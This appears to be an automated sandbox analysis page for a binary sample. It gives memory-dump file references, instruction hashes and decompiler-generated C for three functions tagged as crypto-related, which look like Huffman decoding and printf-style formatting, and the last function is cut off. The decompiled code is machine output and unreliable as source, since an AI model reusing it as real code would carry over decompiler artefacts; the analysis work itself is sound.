0x0083e013
0x0083e01a
0x0083e01e
0x0083e025
0x0083e04b
0x0083e057
0x0083e05b
0x0083e069
0x0083e074
0x0083e08b
0x0083e097
0x0083e09b
0x0083e0b2
0x0083e0c7
0x0083e0ce
0x0083e0cf
0x0083e0d3
0x0083e0da
0x00000000
0x00000000
0x0083e0e0
0x0083e0ea
0x0083e0ed
0x0083e0f1
0x0083e0f3
0x0083e0f7
0x0083e0fc
0x0083e0ff
0x0083e103
0x0083e109
0x0083e10b
0x0083e10f
0x0083e11e
0x0083e14e
0x0083e15f
0x0083e171
0x0083e18d
0x0083e196
0x0083e19a
0x0083e1d3
0x0083e1da
0x0083e1de
0x0083e20b
0x0083e212
0x0083e212
0x0083e217
0x0083e217
0x0083e221
0x0083e225
0x0083e229
0x0083e22d
0x0083e231
0x0083e234
0x0083e238
0x0083e23c
0x0083e246
0x0083e253
0x0083e25f
0x0083e266
0x0083e270
0x0083e27c
0x0083e280
0x0083e284
0x0083e28e
0x0083e297
0x0083e2a1
0x0083e2ae
0x0083e2c0
0x0083e2d2
0x0083e2db
0x0083e2e1
0x0083e2f1
0x0083e306
0x0083e31b
0x0083e32a
0x0083e337
0x0083e342
0x0083e34b
0x0083e358
0x0083e362
0x0083e372
0x0083e375
0x0083e378
0x0083e37f
0x0083e383
0x0083e385
0x0083e389
0x0083e38d
0x0083e395
0x0083e395
0x0083e39f
0x0083e3a3
0x0083e3aa
0x0083e3b0
0x0083e3ba
0x0083e3be
0x0083e3c2
0x0083e3c6
0x0083e3cd
0x0083e3d0
0x0083e3d4
0x0083e3d7
0x0083e3d9
0x0083e3dc
0x0083e3df
0x0083e3e3
0x0083e3e3
0x00000000
0x0083e3ee
0x00000000
0x0083df75
0x0083e407

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a452170c2d8c02d73a31f96a3e35b5a547ac0b6890e4718758f0bd23aafedc1
Instruction ID: 233c1cee6f1f43f6c72550e8c812b9b3a13c63dea5e129bc96053527bfbeede8
Opcode Fuzzy Hash: 8a452170c2d8c02d73a31f96a3e35b5a547ac0b6890e4718758f0bd23aafedc1
Instruction Fuzzy Hash: E8E146755183808FC304CF29E89086ABBF0BBCA301F89095EF9D987356D375E955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 008436C1, Relevance: .3, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E008436C1(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E0083A575(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E0083A58C(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E0084E920(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E0083A575(_t184, 2);
						do {
							 *(_t201 + 0x14) = E0083A58C(_t184) >> 0x0000000c & 0x000000ff;
							E0083A575(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
								goto L15;
							}
							_t187 = E0083A58C(_t184) >> 0x0000000c & 0x000000ff;
							E0083A575(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E00842CFB();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E0083A591(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E0083A58C(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E0083A58C(_t157) >> 0xd) + 3;
													_push(3);
												}
												E0083A575(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E0083A58C(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E0083A58C(_t166) >> 0xd) + 3;
												_push(3);
											}
											E0083A575(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E00844406(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E00842CFB();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E00842CFB();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E00842CFB();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00842CFB();
							E0084EA80(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E008424A8(_t185 + 0x98d8, _t178, _t205);
				}
				_t135 = E00844406(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}

0x008436c1
0x008436c8
0x008436d1
0x008436d9
0x008436e8
0x008436f3
0x008436fa
0x008436ff
0x00843704
0x00843729
0x0084372b
0x00843731
0x00843737
0x0084373d
0x00843742
0x00843751
0x00843756
0x00843756
0x0084375d
0x00843763
0x00843774
0x00843778
0x0084377d
0x00843781
0x00843784
0x008437bd
0x00000000
0x008437bd
0x00843794
0x00843797
0x0084379c
0x0084379e
0x008437a7
0x008437a7
0x008437aa
0x008437aa
0x008437ab
0x008437ae
0x00000000
0x00000000
0x008437b0
0x008437b5
0x008437b6
0x008437b8
0x00000000
0x00000000
0x00000000
0x008437b8
0x008437ba
0x00000000
0x008437ba
0x008437a0
0x008437c1
0x008437c1
0x008437c2
0x008437c2
0x008437c7
0x008437c9
0x008437d1
0x008437d6
0x008437d7
0x008437dc
0x008437dc
0x008437de
0x008437e7
0x008437e9
0x008437fa
0x008437fc
0x00843803
0x00843809
0x0084380f
0x00843813
0x00843840
0x00843841
0x00843842
0x00843846
0x00843848
0x00843866
0x00843869
0x00843875
0x00843877
0x0084387b
0x00843880
0x0084388d
0x0084388f
0x00843892
0x00843894
0x00843894
0x00843896
0x0084389e
0x0084389e
0x008438a1
0x008438b8
0x008438bb
0x00843907
0x00843909
0x00843926
0x00843926
0x00843929
0x0084390b
0x00843915
0x00843918
0x00843918
0x0084392d
0x00843932
0x00843932
0x00843933
0x00843939
0x00000000
0x00000000
0x0084393b
0x00843940
0x00843941
0x00843943
0x00000000
0x00000000
0x00843945
0x00843945
0x00000000
0x00843945
0x00000000
0x00843932
0x008438bd
0x008438c0
0x008438c2
0x008438df
0x008438df
0x008438e2
0x008438c4
0x008438ce
0x008438d1
0x008438d1
0x008438e6
0x008438eb
0x008438ed
0x00843968
0x00843968
0x008439e7
0x00000000
0x008438ef
0x008438ef
0x008438ef
0x008438f0
0x008438f6
0x00000000
0x00000000
0x008438fc
0x00843900
0x00843901
0x00843903
0x00000000
0x00000000
0x00000000
0x00843905
0x00000000
0x008438ef
0x008438ed
0x008438ae
0x008438b2
0x00000000
0x008438b2
0x00843851
0x00843851
0x00843853
0x00843853
0x00843855
0x00000000
0x00000000
0x00843857
0x00843858
0x0084385b
0x0084385e
0x00000000
0x00000000
0x00000000
0x00843860
0x00843862
0x00000000
0x00843862
0x00843817
0x0084381a
0x00843824
0x0084382c
0x00843831
0x00843834
0x00000000
0x00843834
0x008437ed
0x008437f2
0x008437f4
0x00000000
0x00000000
0x00000000
0x0084394b
0x0084394b
0x0084394b
0x00843957
0x00843959
0x00843960
0x00843966
0x0084396c
0x00843979
0x0084397e
0x0084397f
0x00843984
0x0084398e
0x00843996
0x00843997
0x0084399c
0x008439a6
0x008439ae
0x008439af
0x008439b4
0x008439be
0x008439c6
0x008439c7
0x008439dd
0x008439e5
0x00000000
0x008439e5
0x00000000
0x00843966
0x0084370c
0x00843716
0x00843717
0x00000000
0x0084371e
0x008436db
0x008436e2
0x00000000
0x00000000
0x008439f1

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a617c1ada0a93cd2e5fc4104e071ca5ab75f100ba31abb5d19aafa8a1e8b291
Instruction ID: 85073b23fb2949f7e93a40a5c1c5c931b5e217981289d42967471b8117fa35bd
Opcode Fuzzy Hash: 1a617c1ada0a93cd2e5fc4104e071ca5ab75f100ba31abb5d19aafa8a1e8b291
Instruction Fuzzy Hash: 9F9125B020434D9BDB28EF68D891BBEBBD5FB90304F10092DE5D6C7282DB749644C792

Uniqueness

Uniqueness Score: -1.00%

Function 00853F49, Relevance: .2, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00853F49(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t96;
				signed int _t98;
				signed int _t99;
				signed int _t103;
				signed int* _t104;
				void* _t106;
				signed int _t112;
				unsigned int _t114;
				signed char _t116;
				void* _t124;
				unsigned int _t125;
				void* _t126;
				signed int _t127;
				short _t128;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;

				_t126 = __edi;
				_t52 =  *0x86d668; // 0x14325215
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E0085497B(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E0084E243(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E00853210(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E00854C7B(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E00853210(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E00854B5D(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00853210(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E00854713(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E008548F0(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00854479(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E0085485D(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E008548D1(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E008542BC(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E0085467B(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00853f49
0x00853f51
0x00853f58
0x00853f5d
0x00853f5f
0x00853f63
0x00853f66
0x00853f6a
0x00853f6b
0x00853f6e
0x00853fdb
0x00853fde
0x0085402d
0x0085402d
0x00854030
0x00853f9c
0x00853f9e
0x00853fa3
0x00853fa5
0x0085404b
0x0085404e
0x00854194
0x00854196
0x008541a5
0x008541a5
0x00854054
0x00854059
0x0085405c
0x0085405f
0x00854063
0x00854069
0x0085406a
0x0085406c
0x00854096
0x00854096
0x0085409a
0x0085409d
0x008540a7
0x008540a9
0x008540ac
0x008540ae
0x008540b4
0x008540b4
0x008540b6
0x008540b6
0x008540b9
0x008540c7
0x008540c7
0x008540c9
0x008540cb
0x008540cc
0x008540ce
0x008540d4
0x008540d6
0x008540d7
0x008540dc
0x008540df
0x008540ed
0x008540ed
0x008540ef
0x008540ef
0x008540fa
0x008540fc
0x00854101
0x00854101
0x00854104
0x0085410a
0x0085410c
0x0085410f
0x0085411f
0x00854124
0x00854124
0x00854139
0x0085413e
0x00854141
0x00854146
0x00854149
0x0085414b
0x0085414d
0x00854150
0x00854153
0x00854160
0x00854165
0x00854165
0x00854153
0x0085416c
0x00854171
0x00854174
0x00854179
0x0085417c
0x0085417e
0x0085418b
0x00854190
0x0085417e
0x00000000
0x00854193
0x008540e3
0x008540e4
0x008540e7
0x00000000
0x00000000
0x008540e9
0x00000000
0x008540e9
0x008540d0
0x008540d2
0x00000000
0x00000000
0x00000000
0x008540d2
0x008540bd
0x008540be
0x008540c1
0x00000000
0x00000000
0x008540c3
0x00000000
0x008540c3
0x00000000
0x008540b0
0x008540a1
0x008540a2
0x008540a5
0x00000000
0x00000000
0x00000000
0x008540a5
0x00854070
0x00854073
0x00854075
0x00854080
0x00854082
0x0085408a
0x0085408c
0x0085408e
0x00000000
0x00000000
0x00854090
0x00854094
0x00854094
0x00000000
0x00854094
0x00854084
0x00854079
0x00854079
0x0085407a
0x00000000
0x0085407a
0x00854077
0x00000000
0x00854077
0x00853fab
0x00000000
0x00853fab
0x00854037
0x00854037
0x0085403a
0x0085400c
0x0085400c
0x0085400d
0x0085400f
0x00854011
0x00000000
0x00854011
0x0085403c
0x0085403f
0x00000000
0x00000000
0x00854045
0x00853fb4
0x00853fb4
0x00000000
0x00853fb4
0x00853fe0
0x00854023
0x00000000
0x00854023
0x00853fe2
0x00853fe5
0x00854018
0x0085401a
0x00000000
0x0085401a
0x00853fe7
0x00853fea
0x00854008
0x00854008
0x00854008
0x00854008
0x00000000
0x00854008
0x00853fec
0x00853fef
0x00854001
0x00000000
0x00854001
0x00853ff1
0x00853ff4
0x00000000
0x00000000
0x00853ff8
0x00000000
0x00853ff8
0x00853f70
0x00000000
0x00000000
0x00853f76
0x00853f78
0x00853fb8
0x00853fb8
0x00853fbb
0x00853fd4
0x00000000
0x00853fd4
0x00853fbd
0x00853fbd
0x00853fc0
0x00000000
0x00000000
0x00853fc3
0x00853fc6
0x00000000
0x00000000
0x00853fc8
0x00853fcb
0x00000000
0x00853fcb
0x00853f7a
0x00853fb2
0x00000000
0x00853fb2
0x00853f7e
0x00000000
0x00000000
0x00853f87
0x00000000
0x00000000
0x00853f8c
0x00000000
0x00000000
0x00853f91
0x00000000
0x00000000
0x00853f9a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cb0c086e41a91d6de8d1d9839660cc089eba394d1f0281c91b467c60df0ab9a
Instruction ID: c1263024db621817cb54d7d8097e666f93ddd069f198885c708bc5b64d73347f
Opcode Fuzzy Hash: 4cb0c086e41a91d6de8d1d9839660cc089eba394d1f0281c91b467c60df0ab9a
Instruction Fuzzy Hash: 35617A71A40F0866DF74996888557BE73A4FB4138FF20291AEE43CB2C1DA51DECE8356

Uniqueness

Uniqueness Score: -1.00%

Function 008439F2, Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E008439F2(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E0083A58C(_t168) >> 0x0000000c & 0x000000ff;
							E0083A575(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E0083A58C(_t168) >> 0x0000000c & 0x000000ff;
							E0083A575(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E00842CFB();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E0083A591(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E0083A58C(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E0083A58C(_t139) >> 0xd) + 3;
													_push(3);
												}
												E0083A575(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
